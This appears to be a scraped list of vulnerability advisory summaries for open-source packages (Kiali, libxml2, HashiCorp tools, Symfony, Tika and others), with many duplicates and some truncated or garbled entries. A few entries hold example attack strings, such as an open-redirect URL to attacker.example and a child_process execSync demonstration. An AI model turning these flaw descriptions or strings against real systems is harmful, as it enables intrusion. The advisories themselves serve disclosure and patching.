A hard-coded cryptographic key vulnerability in the default configuration file was found in Kiali, all versions prior to 1.15.1. A remote attacker could abuse this flaw by creating their own JWT signed tokens and bypass Kiali authentication mechanisms, possibly gaining privileges to view and alter the Istio configuration.
The miekg Go DNS package before 1.1.25, as used in CoreDNS before 1.6.6 and other products, improperly generates random numbers because math/rand is used. The TXID becomes predictable, leading to response forgeries.
The proglottis Go wrapper before 0.1.1 for the GPGME library has a use-after-free, as demonstrated by use for container image pulls by Docker or CRI-O. This leads to a crash or potential code execution during GPG signature verification.
There's a flaw in libxml2. An attacker who is able to submit a crafted file to be processed by an application linked with libxml2 could trigger a use-after-free. The greatest impact from this flaw is to confidentiality, integrity, and availability.
There's a flaw in libxml2. An attacker who is able to submit a crafted file to be processed by an application linked with libxml2 could trigger a use-after-free. The greatest impact from this flaw is to confidentiality, integrity, and availability.
There's a flaw in libxml2 An attacker who is able to submit a crafted file to be processed by an application linked with libxml2 could trigger a use-after-free. The greatest impact from this flaw is to confidentiality, integrity, and availability.
There's a flaw in libxml2 An attacker who is able to submit a crafted file to be processed by an application linked with libxml2 could trigger a use-after-free. The greatest impact from this flaw is to confidentiality, integrity, and availability.
An insufficient JWT validation vulnerability was found in Kiali versions 0.4.0 to 1.15.0 and was fixed in Kiali version 1.15.1, wherein a remote attacker could abuse this flaw by stealing a valid JWT cookie and using that to spoof a user session, possibly gaining privileges to view and alter the Istio configuration.
In Apache Thrift 0.9.3 to 0.12.0, a server implemented in Go using TJSONProtocol or TSimpleJSONProtocol may panic when feed with invalid input data.
Rootless containers run with Podman, receive all traffic with a source IP address of 127.0.0.1 (including from remote hosts). This impacts containerized applications that trust localhost (127.0.01) connections by default and do not require authentication. This issue affects Podman 1.8.0 onwards.
An issue was discovered in setTA in scan_rr.go in the Miek Gieben DNS library before 1.0.10 for Go. A dns.ParseZone() parsing error causes a segmentation violation, leading to denial of service.
routes/api/v1/api.go in Gogs 0.11.86 lacks permission checks for routes: deploy keys, collaborators, and hooks.
The x/text package before 0.3.3 for Go has a vulnerability in encoding/unicode that could lead to the UTF-16 decoder entering an infinite loop, causing the program to crash or run out of memory. An attacker could provide a single byte to a UTF16 decoder instantiated with UseBOM or ExpectBOM to trigger an infinite loop if the String function on the Decoder is called, or the Decoder is passed to golang.org/x/text/transform.String.
An integer overflow in NATS Server before 2.0.2 allows a remote attacker to crash the server by sending a crafted request. If authentication is enabled, then the remote attacker must have first authenticated.
An integer overflow in NATS Server before 2.0.2 allows a remote attacker to crash the server by sending a crafted request. If authentication is enabled, then the remote attacker must have first authenticated.
The Elastic APM agent for Go versions before 1.11.0 can leak sensitive HTTP header information when logging the details during an application panic. Normally, the APM agent will sanitize sensitive HTTP header details before sending the information to the APM server. During an application panic it is possible the headers will not be sanitized before being sent.
Sensitive information written to a log file vulnerability was found in jaegertracing/jaeger before version 1.18.1 when the Kafka data store is used. This flaw allows an attacker with access to the container's log file to discover the Kafka credentials.
HashiCorp Vault and Vault Enterprise logged proxy environment variables that potentially included sensitive credentials. Fixed in 1.3.6 and 1.4.2.
HashiCorp Vault and Vault Enterprise logged proxy environment variables that potentially included sensitive credentials. Fixed in 1.3.6 and 1.4.2.
A flaw was found in podman before 1.7.0. File permissions for non-root users running in a privileged container are not correctly checked. This flaw can be abused by a low-privileged user inside the container to access any other file in the container, even if owned by the root user inside the container. It does not allow to directly escape the container, though being a privileged container means that a lot …
Improper input validation in the Kubernetes API server in versions v1.0-1.12 and versions prior to v1.13.12, v1.14.8, v1.15.5, and v1.16.2 allows authorized users to send malicious YAML or JSON payloads, causing the API server to consume excessive CPU or memory, potentially crashing and becoming unavailable. Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 …
HashiCorp Vault and Vault Enterprise 1.4.0 and 1.4.1, when configured with the GCP Secrets Engine, may incorrectly generate GCP Credentials with the default time-to-live lease duration instead of the engine-configured setting. This may lead to generated GCP credentials being valid for longer than intended. Fixed in 1.4.2.
HashiCorp Vault and Vault Enterprise 1.4.0 and 1.4.1, when configured with the GCP Secrets Engine, may incorrectly generate GCP Credentials with the default time-to-live lease duration instead of the engine-configured setting. This may lead to generated GCP credentials being valid for longer than intended. Fixed in 1.4.2.
In Gogs 0.11.91, MakeEmailPrimary in models/user_mail.go lacks a "not the owner of the email" check.
domain/section/markdown/markdown.go in Documize before 3.5.1 mishandles untrusted Markdown content. This was addressed by adding the bluemonday HTML sanitizer to defend against XSS.
domain/section/markdown/markdown.go in Documize before 3.5.1 mishandles untrusted Markdown content. This was addressed by adding the bluemonday HTML sanitizer to defend against XSS.
Rancher 2 through 2.2.4 is vulnerable to a Cross-Site Websocket Hijacking attack that allows an exploiter to gain access to clusters managed by Rancher. The attack requires a victim to be logged into a Rancher server, and then to access a third-party site hosted by the exploiter. Once that is accomplished, the exploiter is able to execute commands against the cluster's Kubernetes API with the permissions and identity of the …
bluemonday before 1.0.5 allows XSS because certain Go lowercasing converts an uppercase Cyrillic character, defeating a protection mechanism against the "script" string.
The Kubernetes kubectl cp command in versions 1.1-1.12, and versions prior to 1.13.11, 1.14.7, and 1.15.4 allows a combination of two symlinks provided by tar output of a malicious container to place a file outside of the destination directory specified in the kubectl cp invocation. This could be used to allow an attacker to place a nefarious file using a symlink, outside of the destination tree.
This affects all versions of package github.com/u-root/u-root/pkg/tarutil. It is vulnerable to both leading and non-leading relative path traversal attacks in tar file extraction.
All versions of archiver allow attacker to perform a Zip Slip attack via the "unarchive" functions. It is exploited using a specially crafted zip archive, that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a "../../file.exe" location …
In all versions of the package github.com/unknwon/cae/tz, the ExtractTo function doesn't securely escape file paths in zip archives which include leading or non-leading "..". This allows an attacker to add or replace files system-wide.
In all versions of the package github.com/unknwon/cae/tz, the ExtractTo function does not securely escape file paths in zip archives which include leading or non-leading "..". This allows an attacker to add or replace files system-wide.
Path traversal vulnerability in Docker before 1.3.3 allows remote attackers to write to arbitrary files and bypass a container protection mechanism via a full pathname in a symlink in an (1) image or (2) build in a Dockerfile.
A path traversal flaw was found in Buildah in versions before 1.14.5. This flaw allows an attacker to trick a user into building a malicious container image hosted on an HTTP(s) server and then write files to the user's system anywhere that the user has permissions.
In all versions of the package github.com/unknwon/cae/zip, the ExtractTo function does not securely escape file paths in zip archives which include leading or non-leading "..". This allows an attacker to add or replace files system-wide.
Path traversal vulnerability in Docker before 1.3.3 allows remote attackers to write to arbitrary files and bypass a container protection mechanism via a full pathname in a symlink in an (1) image or (2) build in a Dockerfile.
In all versions of the package github.com/unknwon/cae/zip, the ExtractTo function doesn't securely escape file paths in zip archives which include leading or non-leading "..". This allows an attacker to add or replace files system-wide.
A path traversal flaw was found in Buildah in versions before 1.14.5. This flaw allows an attacker to trick a user into building a malicious container image hosted on an HTTP(s) server and then write files to the user's system anywhere that the user has permissions.
This affects all versions of package github.com/u-root/u-root/pkg/tarutil. It is vulnerable to both leading and non-leading relative path traversal attacks in tar file extraction.
This affects all versions of package github.com/u-root/u-root/pkg/uzip. It is vulnerable to both leading and non-leading relative path traversal attacks in zip file extraction.
Path traversal vulnerability in Docker before 1.3.3 allows remote attackers to write to arbitrary files and bypass a container protection mechanism via a full pathname in a symlink in an (1) image or (2) build in a Dockerfile.
Cloud Foundry Routing, all versions before 0.193.0, does not properly validate nonce input. A remote unauthenticated malicious user could forge an HTTP route service request using an invalid nonce that will cause the Gorouter to crash.
In Go Ethereum (aka geth) before 1.8.14, TraceChain in eth/api_tracer.go does not verify that the end block is after the start block.
In Go Ethereum (aka geth) before 1.8.14, TraceChain in eth/api_tracer.go does not verify that the end block is after the start block.
Cloud Foundry Routing, all versions before 0.193.0, does not properly validate nonce input. A remote unauthenticated malicious user could forge an HTTP route service request using an invalid nonce that will cause the Gorouter to crash.
Cloud Foundry Routing, all versions before 0.193.0, does not properly validate nonce input. A remote unauthenticated malicious user could forge an HTTP route service request using an invalid nonce that will cause the Gorouter to crash.
HashiCorp Consul and Consul Enterprise does not appropriately enforce scope for local tokens issued by a primary data center, where replication to a secondary data center was not enabled. Introduced in 1.4.0, fixed in 1.6.6 and 1.7.4.
Cloud Foundry Routing, all versions before 0.193.0, does not properly validate nonce input. A remote unauthenticated malicious user could forge an HTTP route service request using an invalid nonce that will cause the Gorouter to crash.
jwt-go before 4.0.0-preview1 allows attackers to bypass intended access restrictions in situations with []string{} for m["aud"] (which is allowed by the specification). Because the type assertion fails, "" is the value of aud. This is a security problem if the JWT token is presented to a service that lacks its own audience check.
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions prior to 12.6.7 and 12.10.3, a user without Script or Programming right is able to execute script requiring privileges by editing gadget titles in the dashboard. The issue has been patched in XWiki 12.6.7, 12.10.3 and 13.0RC1.
HashiCorp Nomad and Nomad Enterprise up to 0.10.2 incorrectly validated role/region associated with TLS certificates used for mTLS RPC, and were susceptible to privilege escalation. Fixed in 0.10.3.
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions prior to 11.10.13, 12.6.7, and 12.10.2, a user disabled on a wiki using email verification for registration canouldre-activate themself by using the activation link provided for his registration. The problem has been patched in the following versions of XWiki: 11.10.13, 12.6.7, 12.10.2, 13.0. It is possible to workaround the issue by …
InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).
Improper authentication is possible in Apache Traffic Control versions 3.0.0 and 3.0.1 if LDAP is enabled for login in the Traffic Ops API component. Given a username for a user that can be authenticated via LDAP, it is possible to improperly authenticate as that user without that user's correct password.
InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).
Lightning Network Daemon (lnd) before 0.7 allows attackers to trigger loss of funds because of Incorrect Access Control.
go-jose before 1.0.4 suffers from multiple signatures exploitation. The go-jose library supports messages with multiple signatures. However, when validating a signed message the API did not indicate which signature was valid, which could potentially lead to confusion. For example, users of the library might mistakenly read protected header values from an attached signature that was different from the one originally validated.
** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2019-10223. Reason: This candidate is a duplicate of CVE-2019-10223. Notes: All CVE users should reference CVE-2019-10223 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.
When using the Azure backend with a shared access signature (SAS), Terraform versions prior to 0.12.17 may transmit the token and state snapshot using cleartext HTTP.
When using the Azure backend with a shared access signature (SAS), Terraform versions prior to 0.12.17 may transmit the token and state snapshot using cleartext HTTP.
HashiCorp Nomad and Nonad Enterprise up to 0.10.2 HTTP/RPC services allowed unbounded resource usage, and were susceptible to unauthenticated denial of service. Fixed in 0.10.3.
HashiCorp Consul and Consul Enterprise include an HTTP API (introduced in 1.2.0) and DNS (introduced in 1.4.3) caching feature that was vulnerable to denial of service. Fixed in 1.6.6 and 1.7.4.
HashiCorp Nomad and Nonad Enterprise up to 0.10.2 HTTP/RPC services allowed unbounded resource usage, and were susceptible to unauthenticated denial of service. Fixed in 0.10.3.
HashiCorp Consul and Consul Enterprise up to 1.6.2 HTTP/RPC services allowed unbounded resource usage, and were susceptible to unauthenticated denial of service. Fixed in 1.6.3.
HashiCorp Consul and Consul Enterprise include an HTTP API (introduced in 1.2.0) and DNS (introduced in 1.4.3) caching feature that was vulnerable to denial of service. Fixed in 1.6.6 and 1.7.4.
Description The ability to enumerate users was possible without relevant permissions due to different exception messages depending on whether the user existed or not. It was also possible to enumerate users by using a timing attack, by comparing time elapsed when authenticating an existing user and authenticating a non-existing user. Resolution We now ensure that 403s are returned whether the user exists or not if the password is invalid or …
The ability to enumerate users was possible without relevant permissions due to different exception messages depending on whether the user existed or not.
Description The ability to enumerate users was possible without relevant permissions due to different exception messages depending on whether the user existed or not. It was also possible to enumerate users by using a timing attack, by comparing time elapsed when authenticating an existing user and authenticating a non-existing user. Resolution We now ensure that 403s are returned whether the user exists or not if the password is invalid or …
The package koa-remove-trailing-slashes is vulnerable to Open Redirect via the use of trailing double slashes in the URL when accessing the vulnerable endpoint (such as https://example.com//attacker.example/). The vulnerable code is in index.js::removeTrailingSlashes(), as the web server uses relative URLs instead of absolute URLs.
Matrix-React-SDK is a react-based SDK for inserting a Matrix chat/voip client into a web page., when uploading a file, the local file preview can lead to execution of scripts embedded in the uploaded file. This can only occur after several user interactions to open the preview in a separate tab. This only impacts the local user while in the process of uploading. It cannot be exploited remotely or by other …
fastify-csrf is an open-source plugin helps developers protect their Fastify server against CSRF attacks. Versions of fastify-csrf have a "double submit" mechanism using cookies with an application deployed across multiple subdomains, e.g. "heroku"-style platform as a service. of the fastify-csrf fixes it. the vulnerability. The user of the module would need to supply a userInfo when generating the CSRF token to fully implement the protection on their end. This is …
Flask-Security allows redirects after many successful views (e.g. /login) by honoring the ?next query param. There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented …
Access bypass vulnerability in of Drupal Core Workspaces allows an attacker to access data without correct permissions. The Workspaces module does not sufficiently check access permissions when switching workspaces, leading to an access bypass vulnerability. An attacker might be able to see content before the site owner intends people to see the content.
Access bypass vulnerability in of Drupal Core Workspaces allows an attacker to access data without correct permissions. The Workspaces module does not sufficiently check access permissions when switching workspaces, leading to an access bypass vulnerability. An attacker might be able to see content before the site owner intends people to see the content. This vulnerability is mitigated by the fact that sites are only vulnerable if they have installed the …
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in nokogiri.
A cross-site scripting vulnerability exists in koa-shopify-auth v3.1.61-v3.1.62 that allows an attacker to inject JS payloads into the shop parameter on the /shopify/auth/enable_cookies endpoint.
A cross-site scripting vulnerability exists in koa-shopify-auth v3.1.61-v3.1.62 that allows an attacker to inject JS payloads into the shop parameter on the /shopify/auth/enable_cookies endpoint.
An issue was discovered in server.js in TileServer GL The content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page, causing reflected XSS.
When taxes are enabled, the Additional tax classes field was not properly sanitised or escaped before being output back in the admin dashboard, allowing high privilege users such as admin to use XSS payloads even when the unfiltered_html setting is disabled
vmd allows div class="markdown-body" XSS, as demonstrated by Electron remote code execution via require('child_process').execSync('calc.exe') on Windows and a similar attack on macOS.
A prototype pollution vulnerability allows an attacker to cause a denial of service and may also lead to remote code execution.
Prototype pollution vulnerability in deep-override allows an attacker to cause a denial of service and may also lead to remote code execution.
A vulnerability found in libxml2 shows that it does not propagate errors while parsing XML mixed content, causing a NULL dereference. If an untrusted XML document was parsed in recovery mode and post-validated, the flaw could be used to crash the application. The highest threat from this vulnerability is to system availability.
A vulnerability found in libxml2 shows that it does not propagate errors while parsing XML mixed content, causing a NULL dereference. If an untrusted XML document was parsed in recovery mode and post-validated, the flaw could be used to crash the application. The highest threat from this vulnerability is to system availability.
A vulnerability found in libxml2 shows that it does not propagate errors while parsing XML mixed content, causing a NULL dereference. If an untrusted XML document was parsed in recovery mode and post-validated, the flaw could be used to crash the application. The highest threat from this vulnerability is to system availability.
A vulnerability found in libxml2 shows that it does not propagate errors while parsing XML mixed content, causing a NULL dereference. If an untrusted XML document was parsed in recovery mode and post-validated, the flaw could be used to crash the application. The highest threat from this vulnerability is to system availability.
Express-handlebars is a Handlebars view engine for Express. Express-handlebars mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extentions (i.e. file.extension) can be included, files that lack an extension will have .handlebars appended to them. For complete details refer to the …
express-hbs is an Express handlebars template engine. express-hbs mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extentions (i.e. file.extension) can be included, files that lack an extension will have .hbs appended to them.
haml-coffee is a JavaScript templating solution. haml-coffee mixes pure template data with engine configuration options through the Express render API. More specifically, haml-coffee supports overriding a series of HTML helper functions through its configuration options. A vulnerable application that passes user controlled request objects to the haml-coffee template engine may introduce RCE vulnerabilities. Additionally control over the escapeHtml parameter through template configuration pollution ensures that haml-coffee would not sanitize template …
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE.
Impact Passing either 'infinity', 'inf' or float('inf') (or their negatives) to datetime or date fields causes validation to run forever with 100% CPU usage (on one CPU). Patches Pydantic is be patched with fixes available in the following versions: v1.8.2 v1.7.4 v1.6.2 All these versions are available on pypi, and will be available on conda-forge soon. See the changelog for details. Workarounds If you absolutely can't upgrade, you can work …
A possible use-after-free and double-free in c-ares lib if ares_destroy() is called prior to ares_getaddrinfo() completing. This flaw possibly allows an attacker to crash the service that uses c-ares lib. The highest threat from this vulnerability is to this service availability.
GraphHopper is an open-source Java routing engine. In GrassHopper there is a regular expression injection vulnerability that may lead to Denial of Service.
GraphHopper is an open-source Java routing engine. In GrassHopper from and, there is a regular expression injection vulnerability that may lead to Denial of Service.
The OpenID Connect server implementation for MITREid Connect through 1.3.3 contains a Server Side Request Forgery (SSRF) vulnerability. The vulnerability arises due to unsafe usage of the logo_uri parameter in the Dynamic Client Registration request. An unauthenticated attacker can make a HTTP request from the vulnerable server to any address in the internal network and obtain its response (which might, for example, have a JavaScript payload for resultant XSS). The …
CXF supports (via JwtRequestCodeFilter) passing OAuth 2 parameters via a JWT token as opposed to query parameters (see: The OAuth 2.0 Authorization Framework: JWT Secured Authorization Request (JAR)). Instead of sending a JWT token as a "request" parameter, the spec also supports specifying a URI from which to retrieve a JWT token from via the "request_uri" parameter. CXF was not validating the "request_uri" parameter (apart from ensuring it uses "https) …
A flaw was found in OpenJPEG’s encoder. This flaw allows an attacker to pass specially crafted x,y offset input to OpenJPEG to use during encoding. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
A flaw was found in OpenJPEG’s encoder in the opj_dwt_calc_explicit_stepsizes() function. This flaw allows an attacker who can supply crafted input to decomposition levels to cause a buffer overflow. The highest threat from this vulnerability is to system availability.
Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The ability to enumerate users was possible without relevant permissions due to different handling depending on whether the user existed or not when attempting to use the switch users functionality. We now ensure that error codes are returned whether the user exists or not if a user cannot switch to a user or …
Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The ability to enumerate users was possible without relevant permissions due to different handling depending on whether the user existed or not when attempting to use the switch users functionality. We now ensure that status codes are returned whether the user exists or not if a user cannot switch to a user or …
Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The ability to enumerate users was possible without relevant permissions due to different handling depending on whether the user existed or not when attempting to use the switch users functionality. We now ensure that error codes are returned whether the user exists or not if a user cannot switch to a user or …
Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The ability to enumerate users was possible without relevant permissions due to different handling depending on whether the user existed or not when attempting to use the switch users functionality. We now ensure that error codes are returned whether the user exists or not if a user cannot switch to a user or …
A flaw was found in wildfly. The JBoss EJB client has publicly accessible privileged actions which may lead to information disclosure on the server it is deployed on. The highest threat from this vulnerability is to data confidentiality.
Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The ability to enumerate users was possible without relevant permissions due to different handling depending on whether the user existed or not when attempting to use the switch users functionality. We now ensure that error codes are returned whether the user exists or not if a user cannot switch to a user or …
Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The ability to enumerate users was possible without relevant permissions due to different handling depending on whether the user existed or not when attempting to use the switch users functionality. We now ensure that error codes are returned whether the user exists or not if a user cannot switch to a user or …
The Flask-Caching extension for Flask relies on Pickle for serialization, which may lead to remote code execution or local privilege escalation. If an attacker gains access to cache storage (e.g., filesystem, Memcached, Redis, etc.), they can construct a crafted payload, poison the cache, and execute Python code.
ACS Commons version 4.9.2 (and earlier) suffers from a Reflected Cross-site Scripting (XSS) vulnerability in version-compare and page-compare due to invalid JCR characters that are not handled correctly. An attacker could potentially exploit this vulnerability to inject malicious JavaScript content into vulnerable form fields and execute it within the context of the victim's browser. Exploitation of this issue requires user interaction in order to be successful.
Livy server version 0.7.0-incubating (only) is vulnerable to a cross site scripting issue in the session name. A malicious user could use this flaw to access logs and results of other users' sessions and run jobs with their privileges. This issue is fixed in Livy 0.7.1-incubating.
This advisory has been marked as a False Positive and has been removed.
Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The ability to enumerate users was possible without relevant permissions due to different handling depending on whether the user existed or not when attempting to use the switch users functionality. We now ensure that s are returned whether the user exists or not if a user cannot switch to a user or if …
Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The ability to enumerate users was possible without relevant permissions due to different handling depending on whether the user existed or not when attempting to use the switch users functionality. We now ensure that s are returned whether the user exists or not if a user cannot switch to a user or if …
"Push rules" can specify conditions under which they will match, including event_match, which matches event content against a pattern including wildcards. Certain patterns can cause very poor performance in the matching engine, leading to a denial-of-service when processing moderate length events.
Kubernetes version 1.5.0-1.5.4 is vulnerable to a privilege escalation in the PodSecurityPolicy admission plugin resulting in the ability to make use of any existing PodSecurityPolicy object.
A flaw was found in keycloak. Directories can be created prior to the Java process creating them in the temporary directory, but with wider user permissions, allowing the attacker to have access to the contents that keycloak stores in this directory. The highest threat from this vulnerability is to data confidentiality and integrity.
A flaw was found in keycloak. Directories can be created prior to the Java process creating them in the temporary directory, but with wider user permissions, allowing the attacker to have access to the contents that keycloak stores in this directory. The highest threat from this vulnerability is to data confidentiality and integrity.
A flaw was found in keycloak. Directories can be created prior to the Java process creating them in the temporary directory, but with wider user permissions, allowing the attacker to have access to the contents that keycloak stores in this directory. The highest threat from this vulnerability is to data confidentiality and integrity.
A flaw was found in keycloak. Directories can be created prior to the Java process creating them in the temporary directory, but with wider user permissions, allowing the attacker to have access to the contents that keycloak stores in this directory. The highest threat from this vulnerability is to data confidentiality and integrity.
Puma is a concurrent HTTP server for Ruby/Rack applications. The fix for CVE-2019-16770 was incomplete. The original fix only protected existing connections that had already been accepted from having their requests starved by greedy persistent-connections saturating all threads in the same process. However, new connections may still be starved by greedy persistent-connections saturating all threads in all processes in the cluster. A puma server which received more concurrent keep-alive connections …
Puma is a concurrent HTTP server for Ruby/Rack applications. The fix for CVE-2019-16770 was incomplete. The original fix only protected existing connections that had already been accepted from having their requests starved by greedy persistent-connections saturating all threads in the same process. However, new connections may still be starved by greedy persistent-connections saturating all threads in all processes in the cluster. A puma server which received more concurrent keep-alive connections …
Jenkins S3 publisher Plugin does not perform Run/Artifacts permission checks in various HTTP endpoints and API models, allowing attackers with Item/Read permission to obtain information about artifacts uploaded to S3, if the optional Run/Artifacts permission is enabled.
Jenkins S3 publisher Plugin does not perform a permission check in an HTTP endpoint, allowing attackers with Overall/Read permission to obtain the list of configured profiles.
Jenkins P4 Plugin does not perform permission checks in multiple HTTP endpoints, allowing attackers with Overall/Read permission to connect to an attacker-specified Perforce server using attacker-specified username and password.
Openapi generator is a java tool which allows generation of API client libraries (SDK generation), server stubs, documentation and configuration automatically given an OpenAPI Spec. openapi-generator-online creates insecure temporary folders with File.createTempFile during the code generation process. The insecure temporary folders store the auto-generated files which can be read and appended to by any users on the system. The issue has been patched with Files.createTempFile and released in the v5.1.0 …
Due to how Wire handles type information in its serialization format, malicious payloads can be passed to a deserializer. e.g. using a surrogate on the sender end, an attacker can pass information about a different type for the receiving end. And by doing so allowing the serializer to create any type on the deserializing end. This is the same issue that exists for .NET BinaryFormatter https://docs.microsoft.com/en-us/visualstudio/code-quality/ca2300?view=vs-2019.
Jenkins Credentials Plugin does not escape user-controlled information on a view it provides, resulting in a reflected cross-site scripting (XSS) vulnerability.
(This issue is currently in DISPUTED state). The express-cart package for Node.js allows Reflected XSS (for an admin) via a user input field for product options. The vendor states that this "would rely on an admin hacking his/her own website."
A cross-site request forgery (CSRF) vulnerability in Jenkins P4 Plugin allows attackers to connect to an attacker-specified Perforce server using attacker-specified username and password.
JPA Server in HAPI FHIR allows a user to deny service (e.g., disable access to the database after the attack stops) via history requests. This occurs because of a SELECT COUNT statement that requires a full index scan, with an accompanying large amount of server resources if there are many simultaneous history requests.
The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This …
Spring Security 5.4.x to 5.4.3, 5.3.x to 5.3.8.RELEASE, 5.2.x to 5.2.8.RELEASE, and older unsupported versions can fail to save the SecurityContext if it is changed more than once in a single request.A malicious user cannot cause the bug to happen (it must be programmed in). However, if the application's intent is to only allow the user to run with elevated privileges in a small portion of the application, the bug …
Spring Security 5.4.x to 5.4.3, 5.3.x to 5.3.8.RELEASE, 5.2.x to 5.2.8.RELEASE, and older unsupported versions can fail to save the SecurityContext if it is changed more than once in a single request.A malicious user cannot cause the bug to happen (it must be programmed in). However, if the application's intent is to only allow the user to run with elevated privileges in a small portion of the application, the bug …
A carefully crafted or corrupt file may trigger an infinite loop in Tika's MP3Parser up to and including Tika 1.25. Apache Tika users should upgrade to 1.26 or later.
Applications using the “Sensitive Headers” functionality in Spring Cloud Netflix Zuul 2.2.6.RELEASE and below may be vulnerable to bypassing the “Sensitive Headers” restriction when executing requests with specially constructed URLs. Applications that use Spring Security's StrictHttpFirewall (enabled by default for all URLs) are not affected by the vulnerability, as they reject requests that allow bypassing.
Broken Authentication in Atlassian Connect Spring Boot (ACSB) from version 1.1.0 before version 2.1.3: Atlassian Connect Spring Boot is a Java Spring Boot package for building Atlassian Connect apps. Authentication between Atlassian products and the Atlassian Connect Spring Boot app occurs with a server-to-server JWT or a context JWT. Atlassian Connect Spring Boot versions between 1.1.0 - 2.1.2 erroneously accept context JWTs in lifecycle endpoints (such as installation) where only …
When using ConfigurableInternodeAuthHadoopPlugin for authentication, Apache Solr versions prior to 8.8.2 would forward/proxy distributed requests using server credentials instead of original client credentials. This would result in incorrect authorization resolution on the receiving hosts.
This affects all versions before 10.1.14 and from 10.2.0 to 10.2.4 of package com.typesafe.akka:akka-http-core. It allows multiple Transfer-Encoding headers.
In Eclipse Theia versions up to and including, in the notification messages there is no HTML escaping, so Javascript code can run.
The package grpc ; the package @grpc/grpc-js are vulnerable to Prototype Pollution via loadPackageDefinition.
The package grpc ; the package @grpc/grpc-js are vulnerable to Prototype Pollution via loadPackageDefinition.
Openapi generator is a java tool which allows generation of API client libraries (SDK generation), server stubs, documentation and configuration automatically given an OpenAPI Spec. openapi-generator-online creates insecure temporary folders with File.createTempFile during the code generation process. The insecure temporary folders store the auto-generated files which can be read and appended to by any users on the system.
OpenAPI Generator allows generation of API client libraries (SDK generation), server stubs, documentation and configuration automatically given an OpenAPI Spec. okhttp-gson (default library)), scala-finch.
A deadlock vulnerability was found in 'github.com/containers/storage' in versions before 1.28.1. When a container image is processed, each layer is unpacked using tar. If one of those layers is not a valid tar archive this causes an error leading to an unexpected situation where the code indefinitely waits for the tar unpacked stream, which never finishes. An attacker could use this vulnerability to craft a malicious image, which when downloaded …
A deadlock vulnerability was found in 'github.com/containers/storage' in versions before 1.28.1. When a container image is processed, each layer is unpacked using tar. If one of those layers is not a valid tar archive this causes an error leading to an unexpected situation where the code indefinitely waits for the tar unpacked stream, which never finishes. An attacker could use this vulnerability to craft a malicious image, which when downloaded …
Cross-site scripting vulnerability in EC-CUBE to allows a remote attacker to inject a specially crafted script in the specific input field of the EC web site which is created using EC-CUBE. As a result, it may lead to an arbitrary script execution on the administrator's web browser.
SIF is an open source implementation of the Singularity Container Image Format. The siftool new command and func siftool.New() produce predictable UUID identifiers due to insecure randomness in the version of the github.com/satori/go.uuid module used as a dependency. A patch is available in version >= v1.2.3 of the module. Users are encouraged to upgrade.
The redirect module in Liferay Portal before 7.3.3 does not limit the number of URLs resulting in a 404 error that is recorded, which allows remote attackers to perform a denial of service attack by making repeated requests for pages that do not exist.
A carefully crafted or corrupt PSD file can cause excessive memory usage in Apache Tika's PSDParser in versions 1.0-1.23.
The Spinnaker template resolution functionality is vulnerable to Server-Side Request Forgery (SSRF), which allows an attacker to send requests on behalf of Spinnaker potentially leading to sensitive data disclosure.
A carefully crafted or corrupt PSD file can cause an infinite loop in Apache Tika's PSDParser in versions 1.0-1.23.
A carefully crafted or corrupt file may trigger a System.exit in Tika's OneNote Parser. Crafted or corrupted files can also cause out of memory errors and/or infinite loops in Tika's ICNSParser, MP3Parser, MP4Parser, SAS7BDATParser, OneNoteParser and ImageParser. Apache Tika users should upgrade to 1.24.1 or later. The vulnerabilities in the MP4Parser were partially fixed by upgrading the com.googlecode:isoparser:1.1.22 dependency to org.tallison:isoparser:1.9.41.2. For unrelated security reasons, we upgraded org.apache.cxf to 3.3.6 …
HashiCorp vault-action (aka Vault GitHub Action) allows attackers to obtain sensitive information from log files because a multi-line secret was not correctly registered with GitHub Actions for log masking.
vega-util allows manipulation of object prototype. The 'vega.mergeConfig' method within vega-util could be tricked into adding or modifying properties of the Object.prototype.
odata4j 0.7.0 allows ExecuteCountQueryCommand.java SQL injection. NOTE: this product is apparently discontinued.
odata4j 0.7.0 allows ExecuteJPQLQueryCommand.java SQL injection. NOTE: this product is apparently discontinued.
Resolved Only when using H2/MySQL/TiDB as Apache SkyWalking storage, there is a SQL injection vulnerability in the wildcard query cases.
odata4j 0.7.0 allows ExecuteCountQueryCommand.java SQL injection. NOTE: this product is apparently discontinued.
odata4j 0.7.0 allows ExecuteJPQLQueryCommand.java SQL injection. NOTE: this product is apparently discontinued.
